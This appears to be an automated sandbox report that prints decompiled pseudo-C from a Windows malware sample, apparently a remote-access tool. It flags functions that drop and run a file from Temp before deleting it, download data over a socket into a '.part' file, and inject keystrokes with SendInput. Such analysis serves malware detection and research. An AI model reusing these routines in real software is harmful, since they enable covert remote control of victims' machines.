                                            			E0040E77E(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E0040207E(_t60,  &_v136, "\\");
				_t86 = E004059B8(_t60,  &_v112, E00430F6D(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				E00404095(_t60,  &_v28, _t35, _t93,  &_a4);
				E00401F97();
				_t68 =  &_v136;
				E00401F97();
				_push(_t68);
				_push(_t68);
				_t41 = E0040E9BB(E00409C14( &_v316, _t35, _t93, E00401F2E( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E0040207E(_t60, _t90 - 0x18, 0x4554cc);
					_push(0x6f);
					_t73 = 0x461478;
					goto L6;
				} else {
					_t86 =  &_a28;
					E0040E9CB( &_v316,  &_a28, _t94);
					E00409BC5( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401F2E( &_v28);
					asm("movaps xmm0, [0x45b6f0]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E0040207E(_t60, _t90, 0x4554cc);
						_push(0x70);
						E00401790(_t60, 0x461478,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401F2E( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E0040207E(_t60, _t90 - 0x18, 0x4554cc);
						_push(0x6e);
						_t73 = 0x461478;
						L6:
						E00401790(_t60, _t73, _t86, _t97);
					}
				}
				E0040960F(_t60,  &_v316, 0x4554cc);
				E00401F97();
				E00401F97();
				return E00401F97();
			}




















                                            0x0040e77e
                                            0x0040e799
                                            0x0040e7b5
                                            0x0040e7ba
                                            0x0040e7c3
                                            0x0040e7c8
                                            0x0040e7ce
                                            0x0040e7d3
                                            0x0040e7d4
                                            0x0040e7f1
                                            0x0040e7f6
                                            0x0040e7f8
                                            0x0040e8b9
                                            0x0040e8be
                                            0x0040e8c0
                                            0x00000000
                                            0x0040e7fe
                                            0x0040e7fe
                                            0x0040e807
                                            0x0040e812
                                            0x0040e817
                                            0x0040e81e
                                            0x0040e822
                                            0x0040e829
                                            0x0040e830
                                            0x0040e835
                                            0x0040e83c
                                            0x0040e843
                                            0x0040e859
                                            0x0040e85c
                                            0x0040e860
                                            0x0040e868
                                            0x0040e86d
                                            0x0040e871
                                            0x0040e87b
                                            0x0040e884
                                            0x0040e893
                                            0x0040e893
                                            0x0040e899
                                            0x0040e89c
                                            0x0040e8a4
                                            0x0040e8a9
                                            0x0040e8ab
                                            0x0040e8c5
                                            0x0040e8c5
                                            0x0040e8c5
                                            0x0040e89c
                                            0x0040e8d0
                                            0x0040e8d8
                                            0x0040e8e0
                                            0x0040e8f3

                                            APIs
                                              • Part of subcall function 0040E9CB: __EH_prolog.LIBCMT ref: 0040E9D0
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040E87B
                                            • CloseHandle.KERNEL32(00000000), ref: 0040E884
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040E893
                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 0040E847
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                            • String ID: <$@$Temp
                                            • API String ID: 1704390241-1032778388
                                            • Opcode ID: ecde45125a2547081f1815ef9d7bafbff2a873c24d90a3b0232f2fa6b90e92e4
                                            • Instruction ID: 84e7596d1ab04c7d313b86b88bc88367e1e53ffed737974ff925b3da1b20354f
                                            • Opcode Fuzzy Hash: ecde45125a2547081f1815ef9d7bafbff2a873c24d90a3b0232f2fa6b90e92e4
                                            • Instruction Fuzzy Hash: AF417C3190020A9ADB14FBA2DD56AFE7739AF41308F50417EF505760E2EF781A89CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004042FB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E004042FB(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E00447190();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E00405441(0,  &_v48, __eflags, E0040590A( &_v72,  &_a12, __eflags, L".part"));
				E004031D1();
				_t37 = CreateFileW(L00404090( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = L00404090( &_a12);
					MoveFileW(L00404090( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E00401846( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E004020A5(_t58, _t82, _t74, _t85,  &_v12, 8);
								E00401790(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(L00404090( &_v48));
						}
					}
				}
				L9:
				E004031D1();
				E004031D1();
				return _t58;
			}





















                                            0x00404303
                                            0x0040430c
                                            0x00404310
                                            0x00404313
                                            0x00404316
                                            0x00404318
                                            0x00404325
                                            0x00404332
                                            0x0040433a
                                            0x00404354
                                            0x0040435d
                                            0x00404360
                                            0x00404363
                                            0x004043d5
                                            0x004043d6
                                            0x004043df
                                            0x004043ee
                                            0x004043f4
                                            0x00404365
                                            0x00404365
                                            0x00404368
                                            0x00000000
                                            0x0040436a
                                            0x0040436a
                                            0x0040436d
                                            0x00000000
                                            0x0040436f
                                            0x0040436f
                                            0x0040436f
                                            0x0040437e
                                            0x00404383
                                            0x00404385
                                            0x00404386
                                            0x0040438d
                                            0x0040439c
                                            0x004043a2
                                            0x004043ad
                                            0x004043b7
                                            0x004043be
                                            0x00000000
                                            0x00000000
                                            0x004043c6
                                            0x004043c9
                                            0x00000000
                                            0x004043d2
                                            0x004043d2
                                            0x00000000
                                            0x004043d2
                                            0x00000000
                                            0x004043c9
                                            0x00404412
                                            0x00404421
                                            0x00404421
                                            0x0040436d
                                            0x00404368
                                            0x004043f6
                                            0x004043f9
                                            0x00404401
                                            0x0040440e

                                            APIs
                                              • Part of subcall function 0040590A: char_traits.LIBCPMT ref: 00405925
                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00404354
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040439C
                                            • CloseHandle.KERNEL32(00000000), ref: 004043D6
                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 004043EE
                                            • CloseHandle.KERNEL32(?), ref: 00404412
                                            • DeleteFileW.KERNEL32(00000000), ref: 00404421
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                            • String ID: .part
                                            • API String ID: 820096542-3499674018
                                            • Opcode ID: ba87d2f3912fd2c18fba7ef372031fa98d4e659d47d945c6b4475df0b54d480d
                                            • Instruction ID: 7906e58c6a8c87aab80aa75c609295a8004b1e55e3edc7e226e6d54d5c89be62
                                            • Opcode Fuzzy Hash: ba87d2f3912fd2c18fba7ef372031fa98d4e659d47d945c6b4475df0b54d480d
                                            • Instruction Fuzzy Hash: D2314EB1E00219AFDB10EFA1DC859EEB778FB45315F10857AFA01B3191DA746E44CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00439EA2, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 69%
                                            			E00439EA2(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x45f014; // 0x8d941b67
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00437779(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E004294CB(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0042A340(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E004382FE(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0042A340(_t101);
									goto L36;
								}
								_t62 = E004382FE(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0042A340(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00436F33(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00446D30();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E004382FE(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00436F33(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00446D30();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                                            0x00439ea7
                                            0x00439ea8
                                            0x00439ea9
                                            0x00439eb0
                                            0x00439eb4
                                            0x00439eb5
                                            0x00439ebb
                                            0x00439ec1
                                            0x00439ec7
                                            0x00439eca
                                            0x00439eca
                                            0x00439ecd
                                            0x00439ecf
                                            0x00439ecf
                                            0x00439ecd
                                            0x00439ed1
                                            0x00439ed6
                                            0x00439edd
                                            0x00439ee0
                                            0x00439ee0
                                            0x00439efc
                                            0x00439f02
                                            0x00439f07
                                            0x0043a09a
                                            0x0043a0ad
                                            0x00439f0d
                                            0x00439f0d
                                            0x00439f10
                                            0x00439f15
                                            0x00439f19
                                            0x00439f6d
                                            0x00439f6d
                                            0x00439f6f
                                            0x00439f71
                                            0x0043a08f
                                            0x0043a08f
                                            0x0043a091
                                            0x0043a092
                                            0x00000000
                                            0x0043a098
                                            0x00439f82
                                            0x00439f88
                                            0x00439f8a
                                            0x00000000
                                            0x00000000
                                            0x00439f90
                                            0x00439fa2
                                            0x00439fa7
                                            0x00439fab
                                            0x00000000
                                            0x00000000
                                            0x00439fb8
                                            0x00439ff2
                                            0x00439ff5
                                            0x00439ff8
                                            0x00439ffa
                                            0x00439ffc
                                            0x00439ffe
                                            0x0043a04a
                                            0x0043a04a
                                            0x0043a04c
                                            0x0043a04c
                                            0x0043a04e
                                            0x0043a088
                                            0x0043a089
                                            0x00000000
                                            0x0043a08e
                                            0x0043a062
                                            0x0043a067
                                            0x0043a069
                                            0x00000000
                                            0x00000000
                                            0x0043a06d
                                            0x0043a06e
                                            0x0043a06f
                                            0x0043a072
                                            0x0043a0ae
                                            0x0043a0b1
                                            0x0043a074
                                            0x0043a074
                                            0x0043a075
                                            0x0043a075
                                            0x0043a082
                                            0x0043a084
                                            0x0043a086
                                            0x0043a0b7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043a086
                                            0x0043a000
                                            0x0043a003
                                            0x0043a005
                                            0x0043a007
                                            0x0043a009
                                            0x0043a00c
                                            0x0043a011
                                            0x0043a02c
                                            0x0043a02e
                                            0x0043a038
                                            0x0043a03a
                                            0x0043a03b
                                            0x0043a03d
                                            0x00000000
                                            0x00000000
                                            0x0043a03f
                                            0x0043a045
                                            0x0043a045
                                            0x00000000
                                            0x0043a045
                                            0x0043a013
                                            0x0043a015
                                            0x0043a019
                                            0x0043a01e
                                            0x0043a020
                                            0x0043a022
                                            0x00000000
                                            0x00000000
                                            0x0043a024
                                            0x00000000
                                            0x0043a024
                                            0x00439fba
                                            0x00439fbf
                                            0x00000000
                                            0x00000000
                                            0x00439fc5
                                            0x00439fc7
                                            0x00000000
                                            0x00000000
                                            0x00439fde
                                            0x00439fe3
                                            0x00439fe7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00439fed
                                            0x00439f20
                                            0x00439f22
                                            0x00439f24
                                            0x00439f2c
                                            0x00439f4b
                                            0x00439f4d
                                            0x00439f57
                                            0x00439f59
                                            0x00439f5a
                                            0x00439f5c
                                            0x00000000
                                            0x00000000
                                            0x00439f62
                                            0x00439f68
                                            0x00439f68
                                            0x00000000
                                            0x00439f68
                                            0x00439f30
                                            0x00439f34
                                            0x00439f39
                                            0x00439f3d
                                            0x00000000
                                            0x00000000
                                            0x00439f43
                                            0x00000000
                                            0x00439f43

                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00430A81,00430327,00430327,?,?,?,0043A0F3,00000001,00000001,8BE85006), ref: 00439EFC
                                            • __alloca_probe_16.LIBCMT ref: 00439F34
                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043A0F3,00000001,00000001,8BE85006,?,?,?), ref: 00439F82
                                            • __alloca_probe_16.LIBCMT ref: 0043A019
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043A07C
                                            • __freea.LIBCMT ref: 0043A089
                                              • Part of subcall function 00436F33: RtlAllocateHeap.NTDLL(00000000,0042979C,?,?,0042AEE7,?,?,3.1.4 Light,?,?,0040869A,0042979C,?,?,?,?), ref: 00436F65
                                            • __freea.LIBCMT ref: 0043A092
                                            • __freea.LIBCMT ref: 0043A0B7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 3864826663-0
                                            • Opcode ID: 46c1810c3bca1729c9b65072ede70434e205697b207395312ca5507f68349a44
                                            • Instruction ID: 1f57d64abd7d9dd96addd2a1cacbb5776b3cc1969847cba44f0862899c735d55
                                            • Opcode Fuzzy Hash: 46c1810c3bca1729c9b65072ede70434e205697b207395312ca5507f68349a44
                                            • Instruction Fuzzy Hash: 1B510372600216AFEB298F64CC81EBF77B9EB48750F15562EFC04D6240EB7CDC50865A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040FA37, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 0040FA6B
                                            • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 0040FA89
                                            • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 0040FAA6
                                            • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 0040FAB8
                                            • SendInput.USER32(00000001,00000001,0000001C), ref: 0040FACF
                                            • SendInput.USER32(00000001,00000001,0000001C), ref: 0040FAEC
                                            • SendInput.USER32(00000001,00000001,0000001C), ref: 0040FB08
                                            • SendInput.USER32(00000001,?,0000001C,?), ref: 0040FB25
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: InputSend
                                            • String ID:
                                            • API String ID: 3431551938-0
                                            • Opcode ID: 81cb95813e3cd625db4f4c2e7d6412011c63edb225e30e851ab3ff418c9f7922
                                            • Instruction ID: 37037214c3f1dd8593ca772b9e870ea96dc033958d942ddd43126bb14f9d8ec0
                                            • Opcode Fuzzy Hash: 81cb95813e3cd625db4f4c2e7d6412011c63edb225e30e851ab3ff418c9f7922
                                            • Instruction Fuzzy Hash: 1C310F71E5025DA9FB209BD1CC46FFFBB78AF18B14F04002AE604BA1C1D6F955858BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043E495, Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E0043E495(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E004368EF(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E00436F33(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E00437795(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x45f188; // 0x45f180
								 *_t133 = _t57;
								_t58 =  *0x45f18c; // 0x46063c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x45f190; // 0x46063c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x45f1b8; // 0x45f184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x45f1bc; // 0x460640
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E00436F33(_t107, 4);
							_v20 = _t134;
							E00437795(0);
							if(_t134 == 0) {
								L11:
								E00437795(_v8);
								E00437795(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E00440E70(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E00440E70(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E00440E70(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E00440E70(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E00440E70(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E0043E42C(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E00437795(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x45f188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E00437795( *((intOrPtr*)(_t100 + 0x7c)));
							E00437795( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}



































                                            0x0043e495
                                            0x0043e49e
                                            0x0043e4a5
                                            0x0043e4a8
                                            0x0043e4b1
                                            0x0043e4d0
                                            0x0043e4d3
                                            0x0043e4d8
                                            0x0043e4df
                                            0x0043e4f2
                                            0x0043e4f3
                                            0x0043e4fc
                                            0x0043e4fe
                                            0x0043e501
                                            0x0043e504
                                            0x0043e50a
                                            0x0043e50d
                                            0x0043e520
                                            0x0043e528
                                            0x0043e682
                                            0x0043e685
                                            0x0043e68a
                                            0x0043e68c
                                            0x0043e691
                                            0x0043e694
                                            0x0043e699
                                            0x0043e69c
                                            0x0043e6a1
                                            0x0043e6a4
                                            0x0043e6a9
                                            0x0043e612
                                            0x0043e618
                                            0x0043e61c
                                            0x0043e61e
                                            0x0043e61e
                                            0x00000000
                                            0x0043e61c
                                            0x0043e535
                                            0x0043e538
                                            0x0043e53b
                                            0x0043e544
                                            0x0043e5d9
                                            0x0043e5dc
                                            0x0043e5e5
                                            0x00000000
                                            0x0043e5ee
                                            0x0043e54d
                                            0x0043e552
                                            0x0043e566
                                            0x0043e57a
                                            0x0043e586
                                            0x0043e594
                                            0x0043e5ae
                                            0x0043e5ca
                                            0x0043e5f4
                                            0x0043e607
                                            0x0043e5f8
                                            0x0043e5fc
                                            0x0043e66f
                                            0x00000000
                                            0x00000000
                                            0x0043e671
                                            0x0043e673
                                            0x0043e676
                                            0x0043e678
                                            0x0043e67b
                                            0x0043e602
                                            0x0043e604
                                            0x0043e606
                                            0x0043e606
                                            0x0043e606
                                            0x0043e5fc
                                            0x0043e60c
                                            0x0043e60f
                                            0x00000000
                                            0x0043e60f
                                            0x0043e5cf
                                            0x0043e5d4
                                            0x00000000
                                            0x0043e5d8
                                            0x0043e512
                                            0x00000000
                                            0x0043e51a
                                            0x00000000
                                            0x0043e4bb
                                            0x0043e4bb
                                            0x0043e4bd
                                            0x0043e4c0
                                            0x0043e620
                                            0x0043e620
                                            0x0043e628
                                            0x0043e62a
                                            0x0043e62a
                                            0x0043e632
                                            0x0043e637
                                            0x0043e63b
                                            0x0043e640
                                            0x0043e64b
                                            0x0043e651
                                            0x0043e63b
                                            0x0043e655
                                            0x0043e65a
                                            0x0043e660
                                            0x00000000
                                            0x0043e660

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 9f608431becae6a8c47cc90d34556c9562283f31c788eb22a1df2cced065fa3d
                                            • Instruction ID: 78c07d44da841e1d1a90169ada7e02d74a9cae27f1f184f94decffd17e6df142
                                            • Opcode Fuzzy Hash: 9f608431becae6a8c47cc90d34556c9562283f31c788eb22a1df2cced065fa3d
                                            • Instruction Fuzzy Hash: AB611371901205EFDB20DF6AC842B9EBBF1EB1D310F64516BE944EB382E734AD418B58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

